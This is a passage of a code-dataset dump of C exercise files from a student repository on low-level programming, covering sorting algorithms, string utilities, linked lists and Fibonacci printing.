size; i++)\n\t{\n\t\tp = ((a << ((size - 1) - i)) & n);\n\t\tif (p >> ((size - 1) - i))\n\t\t\tflag = 1;\n\t\tif (flag)\n\t\t{\n\t\t\tb = p >> ((size - 1) - i);\n\t\t\t_putchar(b + 48);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5569548010826111, "alphanum_fraction": 0.5621064901351929, "avg_line_length": 17.585105895996094, "blob_id": "94abcc655841bf92875653a2a2785ff52648152a", "content_id": "335bfb1d3c7d453eca7a4eae6968226234c25b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1747, "license_type": "no_license", "max_line_length": 68, "num_lines": 94, "path": "/0x1B-sorting_algorithms/103-merge_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "# include \"sort.h\"\n/**\n * merging - merge the values in the position of array and copy\n * @array: first array\n * @copy: copy of array, and second array\n * @posi: initial position\n * @middle: middle position the final + 1 of the first array and the\n * first one of the second array\n * @size: size of second array\n */\nvoid merging(int *array, int posi, int middle, int size, int *copy)\n{\n\tint i, j, k;\n\n\ti = posi;\n\tj = middle;\n\tprintf(\"Merging...\\n\");\n\tprintf(\"[left]: \");\n\tfor (k = i; k < j; k++)\n\t{\n\t\tif (k != j - 1)\n\t\t\tprintf(\"%d, \", array[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", array[k]);\n\t}\n\tprintf(\"[right]: \");\n\tfor (k = j; k < size; k++)\n\t{\n\t\tif (k != size - 1)\n\t\t\tprintf(\"%d, \", array[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", array[k]);\n\t}\n\tprintf(\"[Done]: \");\n\tfor (k = i; k < size; k++)\n\t{\n\t\tif (i < middle && (j >= size || array[i] <= array[j]))\n\t\t{\n\t\t\tcopy[k] = array[i];\n\t\t\ti++;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcopy[k] = array[j];\n\t\t\tj++;\n\t\t}\n\t\tif (k != size - 1)\n\t\t\tprintf(\"%d, \", copy[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", copy[k]);\n\n\t}\n}\n/**\n * partition - separate the array\n * @copy: copy of array\n * @posi: initial position\n * @size: size of array\n * @array: original array\n */\nvoid partition(int *copy, int posi, int size, int *array)\n{\n\tint middle;\n\n\tif (size - posi < 2)\n\t\treturn;\n\n\tmiddle = (size + posi) / 2;\n\n\tpartition(array, posi, middle, copy);\n\tpartition(array, middle, size, copy);\n\n\tmerging(copy, posi, middle, size, array);\n}\n/**\n * merge_sort - create the copy and send to partition\n * @array: array\n * @size : size of array\n */\nvoid merge_sort(int *array, size_t size)\n{\n\tint *copy, i;\n\n\tcopy = malloc(sizeof(int) * size - 1);\n\n\tif (!copy)\n\t\treturn;\n\n\tfor (i = 0; i < (int)size; i++)\n\t\tcopy[i] = array[i];\n\n\tpartition(copy, 0, size, array);\n\tfree(copy);\n}\n" }, { "alpha_fraction": 0.311367392539978, "alphanum_fraction": 0.33443161845207214, "avg_line_length": 12.19565200805664, "blob_id": "2909a1e3b7bf5c3eecb29ae8686daa654a68e7a2", "content_id": "93cff6a0e16baac454cf72b79974a19679bd8962", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 607, "license_type": "no_license", "max_line_length": 57, "num_lines": 46, "path": "/0x01-variables_if_else_while/102-print_comb5.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n#include<stdlib.h>\n/**\n * main - Entry point\n *\n * Return: Always 0 (Success)\n */\nint main(void)\n{\n\tint x, y, z, a, b;\n\n\tfor (x = '0'; x <= '9'; x++)\n\t{\n\t\tfor (y = '0'; y <= '9'; y++)\n\t\t{\n\t\t\tfor (z = x; z <= '9'; z++)\n\t\t\t{\n\t\t\t\tif (z == x)\n\t\t\t\t{\n\t\t\t\t\tb = y + 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tb = '0';\n\t\t\t\t}\n\t\t\t\tfor (a = b; a <= '9'; a++)\n\t\t\t\t{\n\t\t\t\t\tputchar(x);\n\t\t\t\t\tputchar(y);\n\t\t\t\t\tputchar(' ');\n\t\t\t\t\tputchar(z);\n\t\t\t\t\tputchar(a);\n\t\t\t\t\tif (!(x == '9' && y == '8' && z == '9' && a == '9'))\n\t\t\t\t\t{\n\t\t\t\t\t\tputchar(',');\n\t\t\t\t\t\tputchar(' ');\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tputchar('\\n');\n\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5009596943855286, "alphanum_fraction": 0.5201535224914551, "avg_line_length": 16.366666793823242, "blob_id": "7d179f8aef35a851715be5b80c076a173af7e0ef", "content_id": "0e2a7b2990b837b1c3842d3ccb5c507d556d1885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 521, "license_type": "no_license", "max_line_length": 66, "num_lines": 30, "path": "/0x1B-sorting_algorithms/0-bubble_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * bubble_sort - function that sorts an array using bubble sorting\n * @array: array to sort\n * @size: size of the array\n * Return: Nothing\n */\nvoid bubble_sort(int *array, size_t size)\n{\n\tint cont = 1, aux = 0;\n\tsize_t i, j;\n\n\tfor (j = 0; j < size; j++)\n\t{\n\t\tcont = 0;\n\t\tfor (i = 0; i < size - 1; i++)\n\t\t{\n\t\t\tif (array[i] > array[i + 1])\n\t\t\t{\n\t\t\t\tcont++;\n\t\t\t\taux = array[i];\n\t\t\t\tarray[i] = array[i + 1];\n\t\t\t\tarray[i + 1] = aux;\n\t\t\t\tprint_array(array, size);\n\t\t\t}\n\t\t}\n\t\tif (cont == 0)\n\t\t\tbreak;\n\t}\n}\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.628654956817627, "avg_line_length": 21.799999237060547, "blob_id": "ed281fc4af3450e1ad29adea31b389de2ec83ec5", "content_id": "6daa5541bf0ce0befaf13d1cf51f050a22f3de71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 342, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/0x06-pointers_arrays_strings/103-print_buffer.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_buffer - function that print the content of the buffer.\n * @b: pointer to string\n * @size: size of buffer.\n */\nvoid print_buffer(char *b, int size)\n{\n\tint leng_1;\n\n\tfor (leng_1 = 0; b[leng_1] < size; leng_1++)\n\t\t;\n\tprintf(\"Leng of string: %d, size of the buffer: %d\\n\", leng_1, size);\n}\n" }, { "alpha_fraction": 0.5621181130409241, "alphanum_fraction": 0.5702647566795349, "avg_line_length": 15.366666793823242, "blob_id": "49e687a0132cd1bf3d48b76f68f7df68b164cc30", "content_id": "ac8eba9b47d513717e8828c4fa5c845f1503e50d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 491, "license_type": "no_license", "max_line_length": 75, "num_lines": 30, "path": "/0x0B-malloc_free/1-strdup.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * _strdup - create new space in memory that contains cpy of a given string\n * @str: given string.\n * Return: Pointer to allocated memory.\n */\nchar *_strdup(char *str)\n{\n\tchar *cpy_ar;\n\tunsigned int i, cp;\n\n\tif (str == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; str[i] != '\\0'; i++)\n\t\t;\n\n\tcpy_ar = malloc((i + 1) * sizeof(char));\n\n\tif (cpy_ar == NULL)\n\t\treturn (NULL);\n\n\tfor (cp = 0; cp <= i; cp++)\n\t{\n\t\tcpy_ar[cp] = str[cp];\n\t}\n\n\treturn (cpy_ar);\n}\n" }, { "alpha_fraction": 0.5252525210380554, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 15.5, "blob_id": "e15822fa29003304cb67728072e17aeed7c39080", "content_id": "38edcce2c855178706e034a05af7a1c3998e7638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 297, "license_type": "no_license", "max_line_length": 68, "num_lines": 18, "path": "/0x02-functions_nested_loops/4-isalpha.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isalpha - Verify if variable is a letter lowercase or uppercase.\n * @c: variable for value input.\n * Return: when is a letter return 1.\n */\n\nint _isalpha(int c)\n{\n\tif ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z'))\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.6082473993301392, "alphanum_fraction": 0.6116838455200195, "avg_line_length": 19.785715103149414, "blob_id": "195cd091cae6477b9e8b46295bfe691701d2b742", "content_id": "ffeeb801a55a7ca36708098d4093742a600ee1e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 291, "license_type": "no_license", "max_line_length": 61, "num_lines": 14, "path": "/0x17-doubly_linked_lists/0-print_dlistint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * print_dlistint - prints all the elements of a list_t list.\n * @h: given list.\n * Return: number of nodes.\n */\nsize_t print_dlistint(const dlistint_t *h)\n{\n\tint elements = 0;\n\n\tfor (; h != NULL; h = h->next, elements++)\n\t\tprintf(\"%d\\n\", h->n);\n\treturn (elements);\n}\n" }, { "alpha_fraction": 0.3851590156555176, "alphanum_fraction": 0.434628963470459, "avg_line_length": 11.30434799194336, "blob_id": "39a7478336ee67d666c264fcfd204374f29009fa", "content_id": "a68702315c178bf25bd0e4457ff630473d1ec79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 283, "license_type": "no_license", "max_line_length": 43, "num_lines": 23, "path": "/0x04-more_functions_nested_loops/5-more_numbers.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * more_numbers - Prints the numbers to 14.\n *\n */\n\nvoid more_numbers(void)\n{\n\tint a, x;\n\n\tfor (a = 0; a <= 9; a++)\n\t{\n\t\tfor (x = 0; x <= 14; x++)\n\t\t{\n\t\t\tif (x > 9)\n\t\t\t{\n\t\t\t\t_putchar(x / 10 + '0');\n\t\t\t}\n\t\t\t_putchar(x % 10 + '0');\n\t\t}\n\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.6049625873565674, "alphanum_fraction": 0.6096888780593872, "avg_line_length": 21.469026565551758, "blob_id": "9371666a2b8db24f46dd210ace0bdd6fa53b0dfa", "content_id": "8cdaa9713575519afb06b6ffb18b3cad6eae69e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2539, "license_type": "no_license", "max_line_length": 76, "num_lines": 113, "path": "/0x1B-sorting_algorithms/1-insertion_sort_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * first_swap - look for a minor value of a node inside the list where\n * the current node is bigger, in order to change positions\n * @list: list to sort\n * Return: the node that has the first lower value, which we did the swap\n */\nlistint_t *first_swap(listint_t **list)\n{\n\tlistint_t *cursor;\n\tlistint_t *next;\n\tlistint_t *prev;\n\tlistint_t *n_n;\n\n\tfor (cursor = *list; cursor->next != NULL; cursor = cursor->next)\n\t{\n\t\tif (cursor->n > cursor->next->n)\n\t\t{\n\t\t\tnext = cursor->next;\n\t\t\tprev = cursor->prev;\n\t\t\tn_n = next->next;\n\t\t\tcursor->next = n_n;\n\t\t\tcursor->prev = next;\n\t\t\tif (prev)\n\t\t\t\tprev->next = next;\n\t\t\tnext->prev = prev;\n\t\t\tnext->next = cursor;\n\t\t\tif (n_n)\n\t\t\t\tn_n->prev = cursor;\n\t\t\tcursor = cursor->prev;\n\t\t\tif (cursor->prev == NULL)\n\t\t\t\t*list = cursor;\n\t\t\tprint_list(*list);\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn (cursor);\n}\n/**\n * backward - it a loop from current node where we find the swap to head\n * in order to find if there is a node with a minor value that the current\n * node.\n * @elem: node where we did the swap\n * @list: list to sort\n * Return: 0 if in the first_swap the node went till the tail.\n * 1 if the node didnt went till the tail, but there is no more\n * minor value than the current node inside the list\n * 2 if there was more minor values and the value was the lower inside the\n * list.\n */\nint backward(listint_t **elem, listint_t **list)\n{\n\tlistint_t *cursor, *next, *prev, *p_p;\n\tint a;\n\n\tif ((*elem)->next == NULL)\n\t\ta = 0;\n\telse\n\t\ta = 1;\n\tfor (cursor = *elem; cursor && cursor->prev; cursor = cursor->prev)\n\t{\n\t\tif (cursor->n < cursor->prev->n)\n\t\t{\n\t\t\tnext = cursor->next;\n\t\t\tprev = cursor->prev;\n\t\t\tp_p = prev->prev;\n\t\t\tcursor->next = prev;\n\t\t\tcursor->prev = p_p;\n\t\t\tif (p_p)\n\t\t\t\tp_p->next = cursor;\n\t\t\tif (next)\n\t\t\t\tnext->prev = prev;\n\t\t\tprev->next = next;\n\t\t\tprev->prev = cursor;\n\t\t\tcursor = cursor->next;\n\t\t\tif (cursor->prev->prev != NULL)\n\t\t\t\tprint_list(*list);\n\t\t\telse\n\t\t\t\ta = 2;\n\t\t}\n\t}\n\t*elem = cursor;\n\treturn (a);\n}\n/**\n * insertion_sort_list - sorts a doubly linked list of integers in ascending\n * order using the Insertion sort algorithm\n * @list: unsorted list of integers\n * Return: Nothing\n */\nvoid insertion_sort_list(listint_t **list)\n{\n\tlistint_t *cursor;\n\tint cont = 1;\n\n\tif (list == NULL || *list == NULL)\n\t\treturn;\n\n\twhile (cont != 0)\n\t{\n\t\tcont = 0;\n\t\tcursor = first_swap(list);\n\t\tif (cursor->next != NULL)\n\t\t\tcont = 1;\n\t\tcont = backward(&cursor, list);\n\t\tif (cursor->prev == NULL)\n\t\t{\n\t\t\t*list = cursor;\n\t\t\tif (cont != 0 && cont != 1)\n\t\t\t\tprint_list(*list);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.8012422323226929, "alphanum_fraction": 0.8012422323226929, "avg_line_length": 53, "blob_id": "db2e1ee5b21fd218b3d630b1bcf23b01a74da4e5", "content_id": "a02738f27f0ae97dbfb6149eddac47ccc5535340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 86, "num_lines": 3, "path": "/0x05-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about pointers, arrays, strings and the use of loops and nested loops.\n\nThe objective is to solve problems using this types of objects and loops." }, { "alpha_fraction": 0.4007936418056488, "alphanum_fraction": 0.4246031641960144, "avg_line_length": 13, "blob_id": "d6e85ec2aee1dfd835de14a2e6cea6b502c7ffcb", "content_id": "ad0feba692154e858df2b343cd24f14b94378a4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 504, "license_type": "no_license", "max_line_length": 45, "num_lines": 36, "path": "/0x05-pointers_arrays_strings/100-atoi.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * _atoi - function that convert to integrer.\n * @s: input string.\n *\n * Return: integrer.\n */\nint _atoi(char *s)\n{\n\tunsigned int res = 0, sing = 1, i, si;\n\n\tfor (i = 0; s[i] != '\\0'; i++)\n\t{\n\t\tif (s[i] >= '0' && s[i] <= '9')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif (s[i] == '-')\n\t\t{\n\t\t\tsing = -sing;\n\t\t}\n\t}\n\tfor (si = i; s[si] != '\\0'; ++si)\n\t{\n\t\tif (s[si] >= '0' && s[si] <= '9')\n\t\t{\n\t\t\tres = res * 10 + s[si] - '0';\n\t\t}\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn (sing * res);\n}\n" }, { "alpha_fraction": 0.532567024230957, "alphanum_fraction": 0.5593869686126709, "avg_line_length": 13.5, "blob_id": "951b5243c1916f481d7a1fb51df877510e963c3b", "content_id": "397e4817aa6d4c02d7cf62a9024076ad2d6c2e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 261, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/0x04-more_functions_nested_loops/1-isdigit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isdigit - Verify if variable is a digit from 0 to 9\n * @c: variable for value input.\n * Return: when input is a digit return 1.\n */\n\nint _isdigit(int c)\n{\n\tif (c >= '0' && c <= '9')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.5848684310913086, "alphanum_fraction": 0.6013157963752747, "avg_line_length": 18, "blob_id": "2de9cc516561a70384d63450ec1e805b81ed6ab0", "content_id": "fc24ec7a700eff4692feb78fd8d6245282ea16d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 74, "num_lines": 80, "path": "/0x13-more_singly_linked_lists/102-free_listint_safe.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * free_listpoint2 - frees a listpoin_t list.\n * @head: pointer to first node.\n */\nvoid free_listpoint2(listpoin_t *head)\n{\n\tlistpoin_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n\n/**\n * add_nodepoint2 - adds a new node at the beginning of a listpoin_t list.\n * @head: pointer to first node.\n * @p: given address.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistpoin_t *add_nodepoint2(listpoin_t **head, void *p)\n{\n\tlistpoin_t *temp2;\n\n\ttemp2 = malloc(sizeof(listpoin_t));\n\tif (temp2 == NULL)\n\t\texit(98);\n\ttemp2->p = p;\n\ttemp2->next = *head;\n\t*head = temp2;\n\treturn (temp2);\n}\n\n/**\n * free_listint_safe - frees a listint_t list.\n * @h: pointer to first node.\n * Return: number of nodes in the list.\n */\nsize_t free_listint_safe(listint_t **h)\n{\n\tint count = 0;\n\tlistint_t *cursor = NULL;\n\tlistint_t *temp = NULL;\n\tlistpoin_t *cursor2 = NULL;\n\tlistpoin_t *head_strp = NULL;\n\n\tif (*h == NULL)\n\t\treturn (0);\n\tadd_nodepoint2(&head_strp, (void *)*h);\n\tfor (; *h != NULL; count++)\n\t{\n\t\tif ((*h)->next)\n\t\t\ttemp = (*h)->next;\n\t\telse\n\t\t\ttemp = NULL;\n\t\tfor (cursor2 = head_strp; cursor2 != NULL; cursor2 = cursor2->next)\n\t\t{\n\t\t\tif (temp == cursor2->p)\n\t\t\t{\n\t\t\t\tcount++;\n\t\t\t\tfree(*h);\n\t\t\t\tfree_listpoint2(head_strp);\n\t\t\t\t*h = NULL;\n\t\t\t\treturn (count);\n\t\t\t}\n\t\t}\n\t\tadd_nodepoint2(&head_strp, (void *)temp);\n\t\tcursor = *h;\n\t\t*h = (*h)->next;\n\t\tfree(cursor);\n\t}\n\t*h = NULL;\n\tfree_listpoint2(head_strp);\n\treturn (count);\n}\n" }, { "alpha_fraction": 0.5611940026283264, "alphanum_fraction": 0.5611940026283264, "avg_line_length": 14.952381134033203, "blob_id": "4a1e24b1d372151834ea802738060cbde736107a", "content_id": "f0868b9cc82d2c5b4bf898b664ecb7e21f152241", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 335, "license_type": "no_license", "max_line_length": 45, "num_lines": 21, "path": "/0x07-pointers_arrays_strings/2-strchr.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stddef.h>\n/**\n * _strchr - locates a character in a string.\n * @s: input string.\n * @c: character to be found.\n * Return: pointer to object.\n */\nchar *_strchr(char *s, char c)\n{\n\tunsigned int i;\n\n\tfor (; ; i++)\n\t{\n\t\tif (s[i] == c)\n\t\t\treturn (s + i);\n\t\tif (!s[i])\n\t\t\treturn (NULL);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.4949037432670593, "alphanum_fraction": 0.5175538063049316, "avg_line_length": 16.65999984741211, "blob_id": "f6895d2f082a001f63207d328dc07294b6324d79", "content_id": "ed26460e6679982df5b37ad89b7aac9f5cfd499d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 883, "license_type": "no_license", "max_line_length": 70, "num_lines": 50, "path": "/0x02-functions_nested_loops/104-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter, itnum, next, ini, lni, inl, lnl, nexti, nextl;\n\tlong int itnuml = 8, tendig = 1000000000, carry;\n\n\tin = 1;\n\tln = 2;\n\titnum = 86;\n\tprintf(\"%ld, \", in);\n\tprintf(\"%ld, \", ln);\n\n\tfor (iter = 0; iter <= itnum; iter++)\n\t{ next = in + ln;\n\t\tprintf(\"%ld, \", next);\n\t\tin = ln;\n\t\tln = next;\n\t}\n\tfor (iter = 0; iter <= itnuml; iter++)\n\t{\n\t\tif (iter == 0)\n\t\t{ ini = in % tendig;\n\t\t\tlni = ln % tendig;\n\t\t\tinl = in / tendig;\n\t\t\tlnl = ln / tendig;\n\t\t}\n\t\telse\n\t\t{ ini = lni;\n\t\t\tinl = lnl;\n\t\t\tlni = nexti;\n\t\t\tlnl = nextl;\n\t\t}\n\t\tcarry = (ini + lni) / tendig;\n\t\tnexti = (ini + lni) % tendig;\n\t\tnextl = inl + lnl + carry;\n\t\tprintf(\"%ld%ld\", nextl, nexti);\n\t\tif (!(iter == itnuml))\n\t\t\tprintf(\"%s\", \", \");\n\t\telse\n\t\t\tprintf(\"%s\", \"\\n\");\n\t}\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.46049660444259644, "alphanum_fraction": 0.4808126389980316, "avg_line_length": 11.657142639160156, "blob_id": "2a4d5c6c179a1a536b7a8ba642fe64ca990d71b3", "content_id": "5e96479a53957f731721c70e1022c6fc5608e560", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 443, "license_type": "no_license", "max_line_length": 55, "num_lines": 35, "path": "/0x02-functions_nested_loops/102-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter;\n\tlong int next;\n\n\tin = 1;\n\tln = 2;\n\tprintf(\"%ld, \", in);\n\tprintf(\"%ld, \", ln);\n\n\tfor (iter = 0; iter <= 47; iter++)\n\t{\n\t\tnext = in + ln;\n\t\tprintf(\"%ld\", next);\n\t\tif (!(iter == 47))\n\t\t{\n\t\t\tprintf(\"%s\", \", \");\n\t\t}\n\t\telse\n\t\t{\n\t\t\tprintf(\"%s\", \"\\n\");\n\t\t}\n\t\tin = ln;\n\t\tln = next;\n\t}\n\treturn (0);\n}\n" } ]
142
khaledbnmohamed/SpamDetectorNaiveBayes
https://github.com/khaledbnmohamed/SpamDetectorNaiveBayes
8b1500bda0a5b26c47452e2f90a97558cf15ac0a
edfd26852d0afc4a4a6a73712991fb5fd451ef58
59179f7f0f8f344c648c191f3ad1f4cebe564cd4
refs/heads/master
2020-04-02T14:32:41.624127
2018-10-24T21:08:24
2018-10-24T21:08:24
154,528,679
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6710816621780396, "alphanum_fraction": 0.6795963644981384, "avg_line_length": 33.83516311645508, "blob_id": "62a09646e30fc89d9f3436258b9b61a7787fa062", "content_id": "39dd1496900510ef51472c72199b5371759eb90f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3171, "license_type": "no_license", "max_line_length": 332, "num_lines": 91, "path": "/Spam.py", "repo_name": "khaledbnmohamed/SpamDetectorNaiveBayes", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport string\nimport pprint\nimport numpy as np\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\n\n\n\nwith open('SMSSpamCollection.csv') as f:\n df = pd.read_table(f, sep='\\t', header=None, names=[\"label\",'sms_message'],\n lineterminator='\\n')\n\n\ndf[\"label\"] = df.label.map({\"ham\": 0, \"spam\": 1})\n\n# df['label'] = map(df,di)\n\n#############count vector from scratch on small example data list##########\n\n\ndocuments = ['Hello, how are you!',\n 'Win money, win from home.',\n 'Call me now.',\n 'Hello, Call hello you tomorrow?']\n\n\nlower_case_documents = []\nsans_punctuation_documents = []\nfrequency_list = []\nfrequency_list = Counter()\nfor element in documents:\n \tlower_case_documents.append(element.lower())\n\nfor i in lower_case_documents:\n\tsans_punctuation_documents.append(i.translate(str.maketrans('','',string.punctuation)))\nfor i in lower_case_documents:\n\tfrequency_list.update(Counter(i.split())) ##not completely correct needs to append all results\n#pprint.pprint(frequency_list) \n#print(sans_punctuation_documents)\n\n# print(df.head(5))\n# print(table[1:6,]) \n\n\n\ncount_vector= CountVectorizer(input=documents, encoding='utf-8', decode_error='strict', strip_accents=None, lowercase=True, preprocessor=None, tokenizer=None, stop_words=None, token_pattern=r\"(?u)\\b\\w\\w+\\b\", ngram_range=(1, 1), analyzer='word', max_df=1.0, min_df=1, max_features=None, vocabulary=None, binary=False, dtype=np.int64)\ncount_vector.fit(documents)\ncount_vector.get_feature_names()\n\ndoc_array = count_vector.transform(documents).toarray() #matrix creation then change to array\n\n# print(doc_array)\n\nfrequency_matrix = pd.DataFrame({'Column1':doc_array[:,0],'Column2':doc_array[:,1]})\n\n# print(frequency_matrix)\n\n\n############## Done scratching & back to real world##################\n\nX_train, X_test, y_train, y_test = train_test_split(df['sms_message'], \n df['label'], \n random_state=1)\n\nprint('Number of rows in the total set: {}'.format(df.shape[0]))\nprint('Number of rows in the training set: {}'.format(X_train.shape[0]))\nprint('Number of rows in the test set: {}'.format(X_test.shape[0]))\n\ncount_vector = CountVectorizer()\ntraining_data = count_vector.fit_transform(X_train)\ntesting_data = count_vector.transform(X_test) #WE DON'T DIT OUR TEST DATA HERE\n\n\n\n#FINISHED ^^^^ DATA PREPROCESSING AND NEXT SECTION IS IMPLEMENTING THE TRAINING ALGORITHM####\n\nnaive_bayes = MultinomialNB()\nnaive_bayes.fit(training_data,y_train)\n\npredictions = naive_bayes.predict(testing_data)\n\n# print(predictions)\n\nprint('Accuracy score: ', format(accuracy_score(y_test, predictions) * 100) + \"%\")\nprint('Precision score: ', format(precision_score(y_test, predictions)))\nprint('Recall score: ', format(recall_score(y_test, predictions)))\nprint('F1 score: ', format(f1_score(y_test, predictions)))\n\n" } ]
1
JoseMCoronado/odoo_o_pontx
https://github.com/JoseMCoronado/odoo_o_pontx
32ac12b8fbd0887caf80ef7c2b2c0383e98a4ef6
4348168609b122541e0982220ee7768a94583092
06c9c5cbf6abbdf6432d44dc31923538dc012505
refs/heads/master
2021-01-15T17:29:11.033435
2017-08-09T03:16:19
2017-08-09T03:16:19
99,757,484
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6421207785606384, "alphanum_fraction": 0.646539032459259, "avg_line_length": 31.33333396911621, "blob_id": "bcd6f08fd3935e112fd6c1713baf89c80ae14c6e", "content_id": "04acf21030a40cce78220b98723e8f9d0c658e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 679, "license_type": "no_license", "max_line_length": 90, "num_lines": 21, "path": "/__manifest__.py", "repo_name": "JoseMCoronado/odoo_o_pontx", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Made for Odoo Online. See Odoo LICENSE file for full copyright and licensing details.\n\n{\n 'name': '[JOS] Automated Payment on Successful Payment TX',\n 'category': 'Accounting',\n 'summary': 'Custom',\n 'version': '1.0',\n 'description': \"\"\"\nThis custom module for Odoo Online automatically creates an account.payment\nrecord on successful payment transactions (from payment acquirer). For Authorize.net ONLY.\n \"\"\",\n 'depends': ['base','payment_authorize','account_accountant','base_action_rule'],\n 'data': [\n 'data/fields_actions.xml',\n 'data/views.xml',\n\n ],\n 'installable': True,\n 'application': True,\n}\n" } ]
1
zuosc/PythonCode
https://github.com/zuosc/PythonCode
eae5a4f80e892869791f894b4264397edb8dce44
3592f5780fc9e335fa880a1f7e9aac0e9d33439e
73795d3eb6490dafa0d17344988c193da7c340be
refs/heads/master
2021-01-18T17:46:12.870782
2018-04-04T13:13:45
2018-04-04T13:13:45
69,157,151
1
0
null
null
null
null
null
